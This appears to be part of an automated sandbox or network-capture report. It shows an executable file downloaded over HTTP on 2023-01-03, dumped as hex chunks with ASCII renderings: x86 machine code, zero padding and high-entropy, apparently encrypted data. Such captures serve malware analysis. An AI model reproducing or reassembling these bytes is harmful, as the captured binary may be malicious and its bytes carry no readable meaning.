                                                          2023-01-03 08:46:54 UTC32INData Raw: 32 30 30 30 0d 0a 86 b0 00 00 00 3b c3 74 5e 39 18 75 5a 8b 86 b8 00 00 00 3b c3 74 17 39 18 75 13 50 e8 87 f5 ff ff ff b6 bc 00 00 00 e8 e0 3c 00 00 59 59 8b 86 b4 00 00 00 3b c3 74 17 39 18 75 13 50 e8 66 f5 ff ff ff b6 bc 00 00 00 e8 7a 3c 00 00 59 59 ff b6 b0 00 00 00 e8 4e f5 ff ff ff b6 bc 00 00 00 e8 43 f5 ff ff 59 59 8b 86 c0 00 00 00 3b c3 74 44 39 18 75 40 8b 86 c4 00 00 00 2d fe 00 00 00 50 e8 22 f5 ff ff 8b 86 cc 00 00 00 bf 80 00 00 00 2b c7 50 e8 0f f5 ff ff 8b 86 d0 00 00 00 2b c7 50 e8 01 f5 ff ff ff b6 c0 00 00 00 e8 f6 f4 ff ff 83 c4 10 8d be d4 00 00 00 8b 07 3d e8 1f 41 00 74 17 39 98 b4 00 00 00 75 0f 50 e8 60 3a 00 00 ff 37 e8 cf f4 ff ff 59 59 8d 7e 50 c7 45 08 06 00 00 00 81 7f f8 d0 1d 41 00 74 11 8b 07 3b c3 74 0b 39 18 75 07 50
                                                          Data Ascii: 2000;t^9uZ;t9uP<YY;t9uPfz<YYNCYY;tD9u@-P"+P+P=At9uP`:7YY~PEAt;t9uP
                                                          2023-01-03 08:46:54 UTC40INData Raw: 83 e1 fd 0b cb eb
                                                          Data Ascii:
                                                          2023-01-03 08:46:54 UTC40INData Raw: 0d 0a
                                                          Data Ascii:
                                                          2023-01-03 08:46:54 UTC40INData Raw: 32 30 30 30 0d 0a f0 8b 45 08 83 20 fc 8b 06 b9 00 03 00 00 23 c1 74 20 3d 00 02 00 00 74 0c 3b c1 75 22 8b 45 08 83 20 e3 eb 1a 8b 45 08 8b 08 83 e1 e7 83 c9 04 eb 0b 8b 45 08 8b 08 83 e1 eb 83 c9 08 89 08 8b 45 08 8b 4d 14 c1 e1 05 33 08 81 e1 e0 ff 01 00 31 08 8b 45 08 09 58 20 39 7d 20 8b 45 08 8b 7d 1c 74 26 83 60 20 e1 8b 45 18 d9 00 8b 45 08 d9 58 10 8b 45 08 09 58 60 8b 45 08 83 60 60 e1 d9 07 8b 45 08 d9 58 50 eb 34 8b 48 20 83 e1 e3 83 c9 02 89 48 20 8b 45 18 dd 00 8b 45 08 dd 58 10 8b 45 08 09 58 60 8b 45 08 8b 48 60 83 e1 e3 83 c9 02 89 48 60 dd 07 8b 45 08 dd 58 50 e8 07 03 00 00 8d 45 08 50 53 6a 00 ff 75 10 ff 15 24 11 40 00 8b 4d 08 f6 41 08 10 74 03 83 26 fe f6 41 08 08 74 03 83 26 fb f6 41 08 04 74 03 83 26 f7 f6 41 08 02 74 03 83 26 ef
                                                          Data Ascii: 2000E #t =t;u"E EEEM31EX 9} E}t&` EEXEX`E``EXP4H H EEXEX`EH`H`EXPEPSju$@MAt&At&At&At&
                                                          2023-01-03 08:46:54 UTC48INData Raw: cc cc cc cc cc cc
                                                          Data Ascii:
                                                          2023-01-03 08:46:54 UTC48INData Raw: 0d 0a
                                                          Data Ascii:
                                                          2023-01-03 08:46:54 UTC48INData Raw: 32 30 30 30 0d 0a 55 8b ec 57 8b 7d 08 33 c0 83 c9 ff f2 ae 83 c1 01 f7 d9 83 ef 01 8a 45 0c fd f2 ae 83 c7 01 38 07 74 04 33 c0 eb 02 8b c7 fc 5f c9 c3 8b ff 55 8b ec 83 ec 18 53 56 ff 75 0c 8d 4d e8 e8 56 7a ff ff 8b 5d 08 be 00 01 00 00 3b de 73 54 8b 4d e8 83 b9 ac 00 00 00 01 7e 14 8d 45 e8 50 6a 01 53 e8 7a db ff ff 8b 4d e8 83 c4 0c eb 0d 8b 81 c8 00 00 00 0f b7 04 58 83 e0 01 85 c0 74 0f 8b 81 cc 00 00 00 0f b6 04 18 e9 a3 00 00 00 80 7d f4 00 74 07 8b 45 f0 83 60 70 fd 8b c3 e9 9c 00 00 00 8b 45 e8 83 b8 ac 00 00 00 01 7e 31 89 5d 08 c1 7d 08 08 8d 45 e8 50 8b 45 08 25 ff 00 00 00 50 e8 05 c4 ff ff 59 59 85 c0 74 12 8a 45 08 6a 02 88 45 fc 88 5d fd c6 45 fe 00 59 eb 15 e8 9e 76 ff ff c7 00 2a 00 00 00 33 c9 88 5d fc c6 45 fd 00 41 8b 45 e8 6a 01
                                                          Data Ascii: 2000UW}3E8t3_USVuMVz];sTM~EPjSzMXt}tE`pE~1]}EPE%PYYtEjE]EYv*3]EAEj
                                                          2023-01-03 08:46:54 UTC56INData Raw: 4d de 75 07 66 89
                                                          Data Ascii: Muf
                                                          2023-01-03 08:46:54 UTC56INData Raw: 0d 0a
                                                          Data Ascii:
                                                          2023-01-03 08:46:54 UTC56INData Raw: 31 66 66 38 0d 0a 45 de 42 eb 0e 66 ff 45 de eb 08 ff 45 da eb 03 ff 45 d6 b8 ff 7f 00 00 66 3b d0 72 23 33 c0 33 c9 66 39 45 90 89 45 c8 0f 94 c1 89 45 c4 49 81 e1 00 00 00 80 81 c1 00 80 ff 7f 89 4d cc eb 3b 66 8b 45 d6 0b 55 90 66 89 45 c4 8b 45 d8 89 45 c6 8b 45 dc 89 45 ca 66 89 55 ce eb 1e 33 c0 66 85 f6 0f 94 c0 83 65 c8 00 48 25 00 00 00 80 05 00 80 ff 7f 83 65 c4 00 89 45 cc 83 7d ac 00 0f 85 3c fd ff ff 8b 45 cc 0f b7 4d c4 8b 75 c6 8b 55 ca c1 e8 10 eb 2f c7 45 94 04 00 00 00 eb 1e 33 f6 b8 ff 7f 00 00 ba 00 00 00 80 33 c9 c7 45 94 02 00 00 00 eb 0f c7 45 94 01 00 00 00 33 c9 33 c0 33 d2 33 f6 8b 7d 88 0b 45 8c 66 89 0f 66 89 47 0a 8b 45 94 89 77 02 89 57 06 8b 4d fc 5f 5e 33 cd 5b e8 d7 71 ff ff c9 c3 90 be e6 40 00 12 e7 40 00 68 e7 40 00 9b
                                                          Data Ascii: 1ff8EBfEEEf;r#33f9EEEIM;fEUfEEEEEfU3feH%eE}<EMuU/E33EE3333}EffGEwWM_^3[q@@h@
                                                          2023-01-03 08:46:54 UTC64INData Raw: 32 30 30 30 0d 0a
                                                          Data Ascii: 2000
                                                          2023-01-03 08:46:54 UTC64INData Raw: b7 00 00 00 11 00 00 00 ce 00 00 00 02 00 00 00 d7 00 00 00 0b 00 00 00 18 07 00 00 0c 00 00 00 0c 00 00 00 08 00 00 00 60 9a 47 00 00 00 00 00 60 9a 47 00 01 01 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                          Data Ascii: `G`G
                                                          2023-01-03 08:46:54 UTC72INData Raw: 0d 0a
                                                          Data Ascii:
                                                          2023-01-03 08:46:54 UTC72INData Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                          Data Ascii: 2000
                                                          2023-01-03 08:46:54 UTC80INData Raw: 00 00 00 00 00 00
                                                          Data Ascii:
                                                          2023-01-03 08:46:54 UTC80INData Raw: 0d 0a
                                                          Data Ascii:
                                                          2023-01-03 08:46:54 UTC80INData Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                          Data Ascii: 2000
                                                          2023-01-03 08:46:54 UTC88INData Raw: 00 00 00 00 00 00
                                                          Data Ascii:
                                                          2023-01-03 08:46:54 UTC88INData Raw: 0d 0a
                                                          Data Ascii:
                                                          2023-01-03 08:46:54 UTC88INData Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                          Data Ascii: 2000
                                                          2023-01-03 08:46:54 UTC96INData Raw: 4e 1d e1 3c b4 76
                                                          Data Ascii: N<v
                                                          2023-01-03 08:46:54 UTC96INData Raw: 0d 0a
                                                          Data Ascii:
                                                          2023-01-03 08:46:54 UTC96INData Raw: 32 30 30 30 0d 0a f9 ea 23 58 cd ab ed 41 6c 24 7f 94 58 94 11 ca fd a7 dc 52 20 ee 6a 1b 72 de 1b 9f 58 b3 d7 8f b2 43 9b a0 04 8f f3 48 db a1 2f b6 ec 02 ed b0 4b 04 7d 40 e7 11 df 8f b6 f6 5c 0c 59 7b 00 c2 48 3a 25 e0 c4 b2 e7 bb e3 97 9b df d1 81 ad ee 3c 9f d2 0f 98 8d f5 93 f1 96 e7 dd fc e2 2b 39 3a 1f 4d 84 2e b9 0d bb 17 96 01 f3 77 24 6f 6e 42 28 c7 1d 82 48 02 eb 74 81 63 e1 28 85 25 56 1c 49 96 e6 4b db 5e f6 56 d1 08 41 93 91 34 33 28 77 94 39 28 68 fd c1 87 44 cb fe d4 2b d2 19 31 1a 31 af c4 e5 d1 a4 fb a6 50 10 8b 4d 7f 64 e6 19 6c fc bd fc 0a ac 29 bd 34 0a c0 49 15 cc 8c 0c 12 23 a5 3f bc d8 74 6f bc c5 0c 3a c5 0b 43 7b d4 53 25 31 95 f5 2b 3b e2 ae 13 b3 60 bd fb 66 b0 8f 1b 1a 62 92 f0 e2 64 41 51 b3 f6 14 6d 25 e9 49 73 40 b7 fa 51
                                                          Data Ascii: 2000#XAl$XR jrXCH/K}@\Y{H:%<+9:M.w$onB(Htc(%VIK^VA43(w9(hD+11PMdl)4I#?to:C{S%1+;`fbdAQm%Is@Q
                                                          2023-01-03 08:46:54 UTC104INData Raw: 16 70 26 fb cf 0e
                                                          Data Ascii: p&
                                                          2023-01-03 08:46:54 UTC104INData Raw: 0d 0a
                                                          Data Ascii:
                                                          2023-01-03 08:46:54 UTC104INData Raw: 32 30 30 30 0d 0a f5 31 67 7a 90 c1 eb 3e 6c a4 50 c7 5a 92 4a 96 3f 4e f5 50 0f 97 22 ed cb 55 6f c4 d0 d3 18 75 cb 72 7f 2a 25 dd ae 64 86 fc b7 f8 18 cf 59 0a df c4 b1 42 c2 8c f7 55 af f3 a7 68 26 19 7a 26 d6 61 b0 0f 00 e6 a5 58 56 56 96 f8 14 b6 bb d2 90 8e ec ae 98 a4 81 28 e5 63 ab 4e 69 3d 3b 70 70 6c a1 c5 a4 ed 6b 48 e0 13 77 98 26 d0 87 67 74 86 61 58 9d 2e ba 83 75 29 34 9e 01 37 c1 42 cc 32 84 8b ac 00 35 9f 80 cc 06 e8 bd e8 6f 4d 7c 16 0a 68 3d d8 de 72 2b 1d c6 3c c1 cd 7c a6 21 5c 82 b8 99 20 7c c3 11 3d f4 08 fe d5 19 4e 30 46 64 cb 34 fe a2 4d 60 8f c7 6c d3 3e 4f 60 ff 1a 1c f3 53 37 32 fc 36 90 e5 6f c3 29 5c 09 84 74 b3 7d f6 c4 0a 7a 6e d3 39 48 a2 6d 06 55 76 a4 42 19 7b 7a c3 e0 dc b5 63 45 7e b4 f6 22 aa aa ff d5 cb d8 59 d7 b1
                                                          Data Ascii: 20001gz>lPZJ?NP"Uour*%dYBUh&z&aXVV(cNi=;pplkHw&gtaX.u)47B25oM|h=r+<|!\ |=N0Fd4M`l>O`S726o)\t}zn9HmUvB{zcE~"Y
                                                          2023-01-03 08:46:54 UTC112INData Raw: ae 7a 02 d7 72 d0
                                                          Data Ascii: zr
                                                          2023-01-03 08:46:54 UTC112INData Raw: 0d 0a
                                                          Data Ascii:
                                                          2023-01-03 08:46:54 UTC112INData Raw: 32 30 30 30 0d 0a ec 04 ac 9f 48 27 b9 1a 0e ae 9d 04 6f 4d 1d 8e d4 81 67 0e b1 4d 88 b2 59 46 8c 1d d0 67 8e 40 cc f1 53 62 9a 0a 3a 8d cf da f2 2a ca e4 63 9a c3 0d 2d 62 72 b4 d0 42 6f 3c 3c 32 b1 eb 94 d8 0d 80 8d 41 c9 8a b2 64 bf 24 68 c8 55 60 59 c7 4a f9 bf e0 38 6b 5a 5f 49 92 53 ff 97 98 82 88 91 7e f2 87 57 16 fb 0c 3c 6c 8d da 9b fc 73 55 eb 2a 95 57 99 88 76 71 a3 c3 c9 2a 27 c4 fe a2 15 dc 88 57 c0 01 36 56 02 78 69 9f 6a 13 18 e1 81 71 cf 76 7e 8e 31 9a db da 95 eb c1 b9 0c 34 85 bb c7 0c aa 00 aa c1 a4 c0 08 00 fb e3 60 12 df a0 0a 9e da 44 7e 1b ff 8c 61 24 2b e2 97 cd 80 cc f6 e4 04 29 a6 10 93 8d e4 21 28 15 1b 8d 0a e9 20 d7 63 df 2e 52 df ef 5e 75 de 74 e5 a8 b8 93 a0 4b b9 1a 48 68 fa 17 f4 0c f6 27 28 9b 45 ef 3d 7e e3 56 f6 b6 e1
                                                          Data Ascii: 2000H'oMgMYFg@Sb:*c-brBo<<2Ad$hU`YJ8kZ_IS~W<lsU*Wvq*'W6Vxijqv~14`D~a$+)!( c.R^utKHh'(E=~V
                                                          2023-01-03 08:46:54 UTC120INData Raw: 1d 49 62 ab b2 e8
                                                          Data Ascii: Ib
                                                          2023-01-03 08:46:54 UTC120INData Raw: 0d 0a
                                                          Data Ascii:
                                                          2023-01-03 08:46:54 UTC120INData Raw: 31 66 66 38 0d 0a 2e 10 52 f4 9b 7c bf 14 24 65 f1 7b 68 76 1a 93 c6 b4 0c 72 2e 91 ed 53 3b b9 02 64 de 28 22 7b cc 83 1b 70 f9 05 41 09 1e f9 f1 3f 8e a5 ee 8f 20 fa 98 30 81 34 50 cb f8 7f b3 3a b1 c7 e1 3c c0 01 0d a5 29 5b 7a d1 60 65 ea 06 1d 67 e4 4d 4d 75 ee 8d f5 26 9a fe 03 07 62 5e 0a 7d 93 c3 61 4c b8 a1 d0 fd 4d ed 2d ed 37 7e 67 bf 5f d7 12 6a fc 96 d4 ba 98 06 7a 47 46 2e 7c 64 63 84 9a f4 3f fe d4 b0 a5 38 29 59 f4 16 8a 54 d2 ad 97 9f f3 0c 0c c4 6f 1c aa b7 a3 26 b4 5f da 47 c4 ea 41 cc 77 d3 ec a4 90 e5 e4 07 89 37 e2 b2 50 8f 42 44 f4 f6 dd 0d c8 b2 ab 43 5d f2 a5 bc 1b 06 b3 77 1c 63 84 96 e6 7a b1 f1 fe 1f ba 9b 6a b5 a8 a5 b9 03 02 cc b4 2a 03 b2 5d d8 18 78 0e fc 37 92 9e d7 a7 01 72 e3 05 ed d2 3e 31 0f de 7d b0 d6 ca 74 e9 f0 17
                                                          Data Ascii: 1ff8.R|$e{hvr.S;d("{pA? 04P:<)[z`egMMu&b^}aLM-7~g_jzGF.|dc?8)YTo&_GAw7PBDC]wczj*]x7r>1}t
                                                          2023-01-03 08:46:54 UTC128INData Raw: 32 30 30 30 0d 0a
                                                          Data Ascii: 2000
                                                          2023-01-03 08:46:54 UTC128INData Raw: e1 b0 f4 0b d6 5d b1 81 80 08 62 ab 82 35 35 71 d1 09 74 0b 3b 2f 1b e7 f6 a5 ac e4 e1 6b 08 a9 8c 6a c7 78 10 e0 87 6a c7 eb 93 f8 92 50 2a 74 07 d1 76 d9 ba 8d 15 85 60 27 2c 18 06 8a 56 5a 6b 18 d8 af 75 c5 c8 a6 d6 95 be b6 e8 6d b6 9a fd 59 e7 d0 13 c9 37 40 9b 43 fc 79 e8 50 8e 76 2e 92 1d ff 10 85 91 d7 9d a7 4b a9 d6 eb dc 41 1c f2 e7 ff 32 0e e0 c7 2c b1 ba 20 1b 78 5e 8c 2c 05 00 5c bb 46 aa 46 76 76 d7 4a cc 0c 3b 24 7b 9a a7 10 1f d7 ab 36 db 57 9f 36 a3 79 8d 8f 7f 76 b1 0c 3b b4 dd 32 33 38 41 32 0f c7 4f c8 0f c7 13 2a ec e8 92 f7 62 b9 ae 9e ad 77 96 53 e8 cb 02 a0 43 e5 40 80 85 29 cd 1d a2 d7 84 c3 90 1c 14 9c 87 7a 96 b9 b2 d9 ab 8f e3 1f 68 5c af 16 be d7 eb a8 70 72 8f 9d 31 5f 80 c3 8b ed 3a c3 f3 6b 8a a0 2c b4 12 4c 44 2f 4e 2d d7
                                                          Data Ascii: ]b55qt;/kjxjP*tv`',VZkumY7@CyPv.KA2, x^,\FFvvJ;${6W6yv;238A2O*bwSC@)zh\pr1_:k,LD/N-
                                                          2023-01-03 08:46:54 UTC136INData Raw: 0d 0a
                                                          Data Ascii:
                                                          2023-01-03 08:46:54 UTC136INData Raw: 32 30 30 30 0d 0a ca 36 17 61 9c f9 58 a0 ad d7 cf e3 42 26 cd e2 14 f0 66 8e 6e 57 c9 f5 41 01 83 86 2c 07 65 27 ad a0 fc 63 6d f7 33 c2 8f 35 2b cc 1a 71 7f 66 33 31 df 19 75 1e f2 99 a5 ae 9c 26 89 1d 81 06 c3 68 3b f2 13 00 00 e5 7f 05 ff 08 27 d3 97 63 99 1f fa 8f 2e 3c c5 b4 4c 69 d8 69 5b 2c e5 a4 0d 52 e8 d2 22 b6 c3 61 90 24 b4 57 83 8d c5 c8 94 dc be 7d 61 9c 39 5a 1a 0d df ba 27 b2 82 b3 4c 65 e0 dc 29 f0 6a 47 19 82 b5 2c a2 d8 bd 87 5a 00 8a 1f 71 cb 50 5b 1c e9 86 21 2c d6 7c a7 7f 4b 0f 7c 54 23 94 3f 1d ba aa 67 89 a0 d6 5a 40 15 46 50 05 df 2a 7d 04 39 26 1f 2f 0d 23 13 2a 64 56 4f 86 6e dc 33 20 a2 22 67 83 f0 3c 15 4f 4b 94 ba 07 dd 02 c7 b1 37 94 b9 4a 48 70 ad 12 e7 87 73 2b fa a4 9c 4d 7d 00 ad 46 a1 0b 10 a3 36 63 34 1b 48 88 b2 59
                                                          Data Ascii: 20006aXB&fnWA,e'cm35+qf31u&h;'c.<Lii[,R"a$W}a9Z'Le)jG,ZqP[!,|K|T#?gZ@FP*}9&/#*dVOn3 "g<OK7JHps+M}F6c4HY
                                                          2023-01-03 08:46:54 UTC144INData Raw: 30 5d 1d de 1c 6c
                                                          Data Ascii: 0]l
                                                          2023-01-03 08:46:54 UTC144INData Raw: 0d 0a
                                                          Data Ascii:
                                                          2023-01-03 08:46:54 UTC144INData Raw: 32 30 30 30 0d 0a 7a 9d 35 79 68 20 15 50 25 69 fb e1 68 13 d5 0a bd e9 23 dd 1e 0e a3 5d 0f 59 a1 87 46 66 63 f6 c8 f0 75 aa a3 cc 79 8d 4f aa 8c 6a 8c 47 9f ff 45 05 ef 6b e4 84 a1 60 ce 9d 91 ad 3d e3 b7 f6 c7 ee ea b9 9e 6d e2 7d 31 3b d3 ba 2c 62 36 34 29 0a 71 84 1d 2a 0c 29 19 9f fc f4 ed 21 2c 9f 33 55 01 2e 88 8d 5a 9a bf 94 36 ce ef 44 43 2a 18 d7 70 31 74 9f 20 30 2c 59 75 2d d2 cf 62 ce ff 3b 1e 54 88 90 f4 f0 3a 1e 08 26 f4 07 91 61 a0 85 f9 0e fd 54 fb b0 16 ca 3f 88 55 c9 e8 3e a9 f9 5a 9b 4a 10 2d b1 1a 65 63 8a 1b 6e 7d 1a 7f 3b 9b 96 53 53 36 79 b9 10 a2 05 a3 71 39 3d 74 6c bf ef 50 c1 a1 78 11 05 2c dc d7 9a 47 bb 81 12 00 23 59 04 52 2e 40 bd 55 55 ea 9e 97 ed dc 5a 95 dc d4 01 48 b7 84 92 17 0e 71 94 ce 9a c0 dc 7c 69 9e 6e 1c 6f 9a
                                                          Data Ascii: 2000z5yh P%ih#]YFfcuyOjGEk`=m}1;,b64)q*)!,3U.Z6DC*p1t 0,Yu-b;T:&aT?U>ZJ-ecn};SS6yq9=tlPx,G#YR.@UUZHq|ino
                                                          2023-01-03 08:46:54 UTC152INData Raw: f9 b5 19 c5 3e 7a
                                                          Data Ascii: >z
                                                          2023-01-03 08:46:54 UTC152INData Raw: 0d 0a
                                                          Data Ascii:
                                                          2023-01-03 08:46:54 UTC152INData Raw: 32 30 30 30 0d 0a 92 b8 a0 f9 61 5b 70 29 2a 3a 1c 85 0b 5f 7d 82 3b 01 c9 45 be 54 6b 24 28 fb 91 da ca 19 b0 fd 50 48 79 2e 08 ef 71 cc 63 c4 d5 fb 79 62 13 25 9a a3 19 be c1 c5 2c 9c b4 36 cb e7 ad 1d 3b 49 82 d4 cf 2b 9b f0 28 a2 d5 61 a7 67 ec d6 80 39 a3 f1 7d fb 50 31 3a e0 6c c7 09 6a 98 1e 83 21 33 70 89 e7 e3 5c d9 7a f1 91 23 af a6 39 9c 5e 1f 27 ac 97 2a 2f e0 75 57 85 71 f3 69 e4 42 24 97 9c 86 ca e0 dd 09 f3 a3 d5 a5 a4 af dd c0 cb 7d 57 8a 8c 40 5f 89 1b ed 3f 6b 64 ae 38 3e 3b 5d 5d 69 7a 53 a2 7b 44 09 ee 85 d7 38 5f 4c 58 6a 78 af c5 9b a9 8d dd 1a e9 4c 46 59 60 0c 30 b1 38 1a 4c 37 55 5d 56 8c 10 7e 78 1f ac a5 c3 db f9 01 9a 38 6e ae 02 69 ef 4f a9 39 3f bf 59 ce 64 55 f2 dd ea b8 a0 4e 95 15 1b 38 bf 0a ad ed ed c6 29 ae f4 58 62 34
                                                          Data Ascii: 2000a[p)*:_};ETk$(PHy.qcyb%,6;I+(ag9}P1:lj!3p\z#9^'*/uWqiB$}W@_?kd8>;]]izS{D8_LXjxLFY`08L7U]V~x8niO9?YdUN8)Xb4
                                                          2023-01-03 08:46:54 UTC160INData Raw: 3c ec 07 f9 07 56
                                                          Data Ascii: <V
                                                          2023-01-03 08:46:54 UTC160INData Raw: 0d 0a
                                                          Data Ascii:
                                                          2023-01-03 08:46:54 UTC160INData Raw: 32 30 30 30 0d 0a 44 70 84 76 63 a5 e4 3f da 83 2e aa dc aa a0 0d f1 61 67 da c8 96 42 20 b4 d9 d3 85 29 4f a3 51 da 0e 8e 8f 58 91 26 a7 8e 1a c4 8d b7 8e 28 20 6d a7 dd 1a 48 b1 62 7c 30 c3 71 56 95 3b 4c ae 2e 28 fa c2 ad 49 29 00 2a 05 77 58 3b e7 4c 76 48 66 95 ab 8e 75 74 1a fe 3d 1e 45 05 8f 0b 11 7a ed dc 66 c0 b6 be 4f c8 05 c2 f6 55 03 5d 78 34 bb f1 e5 33 e2 db 47 b5 eb af 63 c0 36 9a d5 5c 5b d9 98 04 e1 38 42 d8 9e 69 25 53 c3 d6 b5 79 9d 84 f0 3b ef ec a9 e4 55 4c f7 ca 52 0e 79 36 87 f5 5c 22 ef 48 fa d6 1c a5 0b 17 be 64 e5 05 9c 33 90 8b ea fe c4 ca 91 bb 12 4d a7 b2 63 4f b7 6e 8b 76 cb ab a4 a6 fd c3 31 07 5e d9 35 d5 ef 80 8b ad bf a9 8c e3 b5 f1 ac 56 01 76 26 1e a1 41 f2 37 ae 47 59 6f 5b ea b4 b7 49 83 d9 9c f3 aa ac d7 4d 96 13 1d
                                                          Data Ascii: 2000Dpvc?.agB )OQX&( mHb|0qV;L.(I)*wX;LvHfut=EzfOU]x43Gc6\[8Bi%Sy;ULRy6\"Hd3McOnv1^5Vv&A7GYo[IM
                                                          2023-01-03 08:46:54 UTC168INData Raw: a8 9a 1f 0b 73 db
                                                          Data Ascii: s
                                                          2023-01-03 08:46:54 UTC168INData Raw: 0d 0a
                                                          Data Ascii:
                                                          2023-01-03 08:46:54 UTC168INData Raw: 32 30 30 30 0d 0a fb 79 7d 75 3e 97 62 46 a0 ea 4d 2a 3f 06 d0 10 eb 1a 1c 16 88 e4 38 e5 66 6d 04 da 48 23 ef 4a fb 27 b2 17 1f d2 57 98 18 48 68 7b 4b 9d 06 76 dd b5 39 94 00 f3 5c d0 ed a3 21 72 6d 9d e0 db d6 a0 ba 70 f3 de 26 d4 bb 1a 0e 2f 72 8d 25 2f f9 a8 46 ba 7d 95 a6 f3 4b 1c fe a0 0d d3 1c 66 7f 64 0b 73 0c 04 b8 5b 7f 57 17 a1 a8 36 d2 1c 25 03 c9 57 85 b0 cc a3 df 28 a7 52 43 a5 89 7d 48 ee 25 e0 df 94 b6 ae cc cb cd 4e 44 52 ee 83 dc 79 19 36 45 fa 34 0b 86 7d 6b 84 1e 4d 9b 8f 16 36 60 74 5b ea c7 21 b8 34 d5 bb c5 cf f2 ad 60 bb 68 1d 4a c8 82 55 90 fd a9 b1 50 25 73 d9 9b 20 19 84 00 e3 7d bb a5 4f d9 5a 81 b1 72 8c 7c 9e d8 89 73 96 20 58 c0 4a 68 b7 e6 e7 f6 34 d3 c5 53 fe 89 23 b4 4f 7a da 85 b5 44 f4 ed 9d 94 90 ac 0e fe 9f ef 6d ba
                                                          Data Ascii: 2000y}u>bFM*?8fmH#J'WHh{Kv9\!rmp&/r%/F}Kfds[W6%W(RC}H%NDRy6E4}kM6`t[!4`hJUP%s }OZr|s XJh4S#OzDm
                                                          2023-01-03 08:46:54 UTC176INData Raw: 7d 5b 37 fe c5 bd
                                                          Data Ascii: }[7
                                                          2023-01-03 08:46:54 UTC176INData Raw: 0d 0a
                                                          Data Ascii:
                                                          2023-01-03 08:46:54 UTC176INData Raw: 32 30 30 30 0d 0a e7 8d 65 e1 ab 2b 01 0e 79 f8 49 36 41 8f f3 ee a7 59 fd bb 31 b9 ce fe 50 20 d2 73 34 21 66 32 46 13 0b bc 90 fa ce cf 4e c9 50 1c 15 29 27 fe be 87 16 85 36 fd d0 46 bb f9 d7 0c 4d e9 42 cb f9 d9 ed e0 2f c5 66 ca 83 75 64 78 42 61 9e a6 e6 08 87 1f 35 be 98 50 df 63 1d 09 a9 5d 5c a4 3c 69 21 ca 67 b7 9c 32 5a 42 d0 82 e2 c8 20 0f f0 02 3a f9 69 b4 c7 8a 31 b3 2c 24 fa 29 41 d0 c3 9c 10 61 86 8e 9e 2f 2b 60 59 51 cb e2 f1 b2 d0 3d 6c 89 dc 85 94 31 21 6f d4 7e fd f1 70 9b 1e 90 9c 3d 0f a8 31 5c 42 36 79 42 b6 f2 d9 54 a8 6d 04 94 b2 3b a5 3c 04 3c de 6c ba 70 3a b2 37 52 c8 81 0c b6 48 69 a8 88 cd a4 dd 8f 0b 31 b0 c1 0a 17 42 77 5f ae a2 29 83 15 1a 28 07 a3 68 4a b9 2c 62 5d bf cf e8 57 d0 d4 94 c3 13 34 3d 67 7a 20 ab 88 c9 26 dd
